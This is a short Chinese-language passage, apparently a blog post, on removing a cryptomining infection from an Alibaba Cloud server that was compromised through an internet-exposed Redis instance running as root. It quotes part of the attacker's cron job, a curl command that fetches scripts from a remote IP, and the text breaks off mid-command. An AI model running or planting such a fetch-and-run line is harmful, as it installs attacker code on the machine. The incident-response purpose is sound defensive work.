阿里雲挖礦批處理病毒的解決方案

背景 打開了redis的外網端口,redis是由root用戶啓動,因此入侵者拿到了root權限,在批處理中加入了兩個定時任務,每5秒鐘去遠程代理服務器(美國)獲取腳本。redis 分析 查看cpu使用率較高的進程 top -c,發現是調用了tmp下的一個文件,tmp下公有多個可疑文件。 crontab -l查看,發現有兩個定時任務,/5 curl -fsSL http://165.225.157.
相關文章
相關標籤/搜索